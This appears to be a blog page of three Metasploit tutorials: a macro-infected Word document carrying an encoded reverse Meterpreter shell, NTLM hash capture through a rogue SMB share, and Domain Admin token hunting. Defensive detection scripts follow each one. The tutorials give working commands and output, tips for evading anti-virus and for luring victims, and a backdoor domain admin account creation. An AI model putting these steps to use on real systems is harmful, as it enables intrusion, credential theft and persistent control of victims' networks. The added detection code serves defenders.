Showing posts with label Tutorials. Show all posts

Friday, June 22, 2012

VBScript Infection Methods


Metasploit has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads; it doesn’t need to be a Metasploit payload. This method is useful for client-side attacks and could also be useful if you have to bypass filtering that blocks executables and only permits documents to pass through.
First things first, let’s create our VBScript and set up a Metasploit listener.
Code:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 280
Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai
root@bt4:/pentest/exploits/framework3# mv payload.exe tools/
root@bt4:/pentest/exploits/framework3# cd tools/
root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 14510 bytes of EXE into a VBA script
root@bt4:/pentest/exploits/framework3/tools# cd ..
root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler
[*] Please wait while we load the module tree...
exploit/multi/handler Generic Payload Handler
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
To recap what we have done so far: we created our payload using the shikata_ga_nai polymorphic encoder, turned it into an executable, and had it connect back to us on port 8080 at host 10.211.55.162. We then converted the executable to VBScript using the “exe2vba.rb” script in the tools directory. Once this is complete, you will need to get on a Windows machine that has Word installed and perform the following steps:
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor. If you’re using Word/Excel 2007, go to View, Macros, enter a name like “moo” and select “Create”.
This opens the Visual Basic editor. Paste the contents of the payload.vbs file into the editor, save it, and type some junk into the Word document itself. This is the point at which you would perform the client-side attack by emailing the Word document to someone.
To keep user suspicion low, try embedding the code in one of the many Word/Excel games available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you extra time to migrate to another process if you are using Meterpreter as a payload.
Here we give a generic name to the macro.
First, test the document by opening it, then check back on our Metasploit exploit/multi/handler listener:
Code:
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696)
 
meterpreter> execute -f cmd.exe -i
Process 2152 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\rel1k>
Success! We have a Meterpreter shell to the system that opened the document, and best of all, it doesn’t get picked up by anti-virus!
Note that there are multiple ways to do this; you could also use:
Code:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe
The Y option outputs the payload as a VBA script directly, so follow the same steps as above. Something to mention is that macros are generally disabled by default in both home and corporate environments, so you would either have to entice the user to enable macros or hope they enable them to view the entire document properly. This is where having the script embedded in a document containing an embedded Flash game comes in handy.
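From the defender's side, the chain this post builds (Word opens, writes payload.exe to the user's temp directory, payload.exe starts cmd.exe) is visible in process-creation telemetry regardless of whether anti-virus recognises the encoded payload. The script below is an added example, not part of the original post or of Metasploit: it runs two rules over a constructed, simplified process-creation log (one `Key=Value|Key=Value` record per line carrying ParentImage, Image and CommandLine, the fields a Sysmon Event ID 1 or Windows 4688 record provides). The sample records and paths are constructed to mirror the post's scenario; the `OFFICE11` directory and the `quarterly-report.doc` name are illustrative.

```python
import re

# Office hosts that should never launch executables from user-writable paths.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and shells a macro typically launches to run a dropped payload.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Directories a macro can write to without elevation (matched anywhere in the path).
USER_WRITABLE = re.compile(
    r"\\(temp|tmp|appdata|downloads|local settings|users\\public)\\", re.IGNORECASE)


def parse_event(line):
    """Split a 'Key=Value|Key=Value' record into a dict (values may contain '=')."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the name of the rule the event trips, or None if it looks benign."""
    parent, image = event["ParentImage"], event["Image"]
    # Rule 1: an Office application started a shell/interpreter, or any binary
    # living in a user-writable directory (the dropped payload itself).
    if basename(parent) in OFFICE_PARENTS and (
            basename(image) in SHELLS or USER_WRITABLE.search(image)):
        return "office_app_spawned_child"
    # Rule 2: a binary running from a user-writable directory started a shell
    # (the post's payload.exe -> cmd.exe step).
    if basename(image) in SHELLS and USER_WRITABLE.search(parent):
        return "shell_from_user_writable_binary"
    return None


def scan(lines):
    """Return (rule, parent name, child name) for every alerting record."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rule = classify(event)
        if rule:
            hits.append((rule, basename(event["ParentImage"]), basename(event["Image"])))
    return hits


# Constructed sample log mirroring the Word -> payload.exe -> cmd.exe chain in the
# post; the two explorer.exe records are normal activity that must not alert.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE"
    r"|Image=C:\Documents and Settings\rel1k\Local Settings\Temp\payload.exe"
    r"|CommandLine=payload.exe",
    r"ParentImage=C:\Documents and Settings\rel1k\Local Settings\Temp\payload.exe"
    r"|Image=C:\WINDOWS\system32\cmd.exe|CommandLine=cmd.exe",
    r"ParentImage=C:\WINDOWS\explorer.exe"
    r"|Image=C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE"
    r"|CommandLine=WINWORD.EXE quarterly-report.doc",
    r"ParentImage=C:\WINDOWS\explorer.exe"
    r"|Image=C:\WINDOWS\system32\cmd.exe|CommandLine=cmd.exe",
]

if __name__ == "__main__":
    for rule, parent, child in scan(SAMPLE_LOG):
        print(f"{rule}: {parent} -> {child}")
```

Rule 1 fires on the first record (WINWORD.EXE launching a binary from the temp directory) and rule 2 on the second (that binary launching cmd.exe); the two explorer.exe records pass. Neither rule depends on the payload's bytes, which is the point: encoding defeats signature matching, not the parent/child relationship.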

NTLM Authentication Hijack using Metasploit


Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
Code:
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
Code:
msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch to our machine and check if you’ve got the hashes captured
Code:
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
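What the capture module labels LMHASH and NTHASH are the client's challenge responses, not the stored hashes, and their lengths tell a defender how the client was configured. The script below is an added example, not part of the original post or of Metasploit: it parses the `[*] Captured ...` line shown above and classifies the NTLM dialect from the response lengths (an NTLMv1 NT response is exactly 24 bytes; an NTLMv2 NT response is a 16-byte HMAC-MD5 plus a variable-length blob, so always longer). The sample line is the one from the post; the regular expression's group names are my own.

```python
import re

# Matches the line server/capture/smb prints; groups are named after its fields.
CAPTURE_RE = re.compile(
    r"\[\*\] Captured (?P<ip>[\d.]+):(?P<port>\d+) "
    r"(?P<domain>[^\\ ]+)\\(?P<user>\S+) "
    r"LMHASH:(?P<lm>[0-9a-fA-F]+) NTHASH:(?P<nt>[0-9a-fA-F]+) "
    r"OS:(?P<os>.*?) LM:(?P<lmos>.*)$"
)


def parse_capture(line):
    """Parse one '[*] Captured ...' line into a dict; ValueError if it does not match."""
    m = CAPTURE_RE.match(line)
    if not m:
        raise ValueError("not a capture line: %r" % line)
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec


def classify_response(lm_hex, nt_hex):
    """Classify the NTLM dialect from the response lengths.

    Returns (dialect, lm_hash_response_present).  The lengths are fixed by the
    protocol: an NTLMv1 NT response is three DES blocks over the 8-byte server
    challenge, exactly 24 bytes; an NTLMv2 NT response is a 16-byte HMAC-MD5
    followed by a variable-length client blob, so it is always longer than 24.
    """
    lm, nt = bytes.fromhex(lm_hex), bytes.fromhex(nt_hex)
    if len(nt) > 24:
        return "NTLMv2", False
    if len(nt) != 24:
        raise ValueError("unexpected NT response length %d" % len(nt))
    # NTLMv1 with NTLM2 session security puts an 8-byte client nonce followed by
    # 16 zero bytes in the LM field; that is not an LM-hash-derived response.
    if len(lm) == 24 and any(lm[:8]) and lm[8:] == bytes(16):
        return "NTLMv1 (NTLM2 session)", False
    return "NTLMv1", any(lm)


def assess(line):
    """Parse a capture line and attach the risk verdict for the client that sent it."""
    rec = parse_capture(line)
    dialect, lm_present = classify_response(rec["lm"], rec["nt"])
    rec["dialect"] = dialect
    rec["lm_response"] = lm_present
    # Anything other than NTLMv2 means the client's LmCompatibilityLevel is below 3.
    rec["weak_client"] = not dialect.startswith("NTLMv2")
    return rec


# The capture line from the post.
SAMPLE_LINE = (
    r"[*] Captured 192.168.1.50:1038 LON-CL1\Administrator "
    "LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d "
    "NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 "
    "OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1"
)

if __name__ == "__main__":
    v = assess(SAMPLE_LINE)
    print(f"{v['domain']}\\{v['user']} from {v['ip']}: {v['dialect']}, "
          f"LM response present={v['lm_response']}, weak client={v['weak_client']}")
```

For the post's line both responses are 24 bytes and the LM field is not a nonce-plus-zeros pattern, so the XP client answered with plain NTLMv1 and an LM response. The corrective control is the `LmCompatibilityLevel` value under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` (Group Policy "Network security: LAN Manager authentication level"): level 3 or higher makes clients send only NTLMv2, and blocking outbound SMB (TCP 445) at the perimeter stops the link in step 3 from reaching an external listener at all.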

Hunting for Domain Admin Tokens


Penetration assessments are a focused effort to accomplish one or more goals within a limited timeframe, so it is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code really excels: less time is wasted on mundane tasks. Automation is key, specifically automating the tasks that should be automated. There are clearly tasks that can’t or shouldn’t be automated, but that is a topic for another post.
One example I have seen during several on-site assessments is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network, and finding it can take hours of manual work. I mentioned this to HD Moore, and he added a plugin to Metasploit that automates the process. To use this new functionality, we start by exploiting a ton of Windows boxes using Meterpreter as the payload.
Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
Example of the file:
Code:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin
We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
Code:
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt
To achieve Domain Admin privileges, we need to connect to a session that contains a Domain Admin token.
Code:
msf> sessions -i [session-with-domain-admin-token]
Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
Code:
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t
Lastly, we add a new account to the domain and add the account into the Domain Admins group.
Code:
C:\>net user hack0r h4ck0r /add /domain
C:\>net group "Domain Admins" hack0r /add /domain
Enjoy it and Pwn dem v0hns!
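The question token_hunter answers from the attacker's side (which hosts hold a Domain Admin token) can be answered from the defender's side before any host is compromised, using the same `DOMAIN\user` list the post feeds to `token_hunt_user` and the logon records the domain controllers already have. The script below is an added example, not part of the original post or of Metasploit: it reads the list in the post's domain-admin.txt format, takes a constructed set of logon records (the account, workstation and logon-type fields of Windows Security event 4624), and reports every Domain Admin logon outside an allow-list of tier-0 hosts. The host names `DC01`, `WS-FINANCE-07` and so on, and the account `COMPANY\alice`, are constructed; the admin names are the post's own placeholders.

```python
# Domain Admin list in the same 'DOMAIN\user' format as the post's domain-admin.txt.
DOMAIN_ADMIN_LIST = """COMPANY\\joe-admin
COMPANY\\bill-admin
COMPANY\\david-admin
"""

# Hosts on which a Domain Admin logon is expected (tier-0 systems). Constructed names.
TIER0_HOSTS = {"DC01", "DC02"}

# Logon types (Windows Security event 4624 'Logon Type' values) that leave a
# delegation-level token, and often cached credentials, on the host.  A network
# logon (type 3) leaves only an impersonation token, which cannot be used to
# authenticate onward to other systems, so it is not counted as exposure.
EXPOSING_LOGON_TYPES = {
    2: "interactive",
    4: "batch",
    5: "service",
    10: "remote_interactive",
    11: "cached_interactive",
}

# Constructed logon records: the fields of interest from 4624 events collected
# from the domain controllers and member servers.
SAMPLE_LOGONS = [
    {"account": "COMPANY\\joe-admin",   "host": "WS-FINANCE-07",  "logon_type": 2},
    {"account": "COMPANY\\joe-admin",   "host": "DC01",           "logon_type": 10},
    {"account": "COMPANY\\bill-admin",  "host": "FILESRV-01",     "logon_type": 3},
    {"account": "COMPANY\\david-admin", "host": "WS-HELPDESK-02", "logon_type": 10},
    {"account": "COMPANY\\alice",       "host": "WS-FINANCE-07",  "logon_type": 2},
]


def load_admins(text):
    """Parse the DOMAIN\\user list into a set of lower-cased account names."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def exposed_sessions(logons, admins, tier0):
    """Return (host, account, logon kind) for every Domain Admin token left on a
    host outside tier 0; these are the sessions token_hunter would find."""
    hits = []
    for rec in logons:
        if rec["account"].lower() not in admins:
            continue
        kind = EXPOSING_LOGON_TYPES.get(rec["logon_type"])
        if kind is None or rec["host"].upper() in tier0:
            continue
        hits.append((rec["host"], rec["account"], kind))
    return hits


def hosts_to_fix(hits):
    """Unique, sorted list of non-tier-0 hosts holding a Domain Admin token."""
    return sorted({host for host, _, _ in hits})


if __name__ == "__main__":
    admins = load_admins(DOMAIN_ADMIN_LIST)
    hits = exposed_sessions(SAMPLE_LOGONS, admins, TIER0_HOSTS)
    for host, account, kind in hits:
        print(f"{host}: {account} ({kind} logon)")
    print("hosts needing attention:", ", ".join(hosts_to_fix(hits)))
```

On the sample data the two workstations where admins logged on interactively or over RDP are reported; the logon on DC01 is expected and the network logon to the file server leaves nothing impersonatable. Each reported host is one the post's `token_hunt_user` would also list, so the remediation (keep Domain Admin accounts off workstations, use separate tier-0 accounts for DC work) removes the targets before they can be hunted.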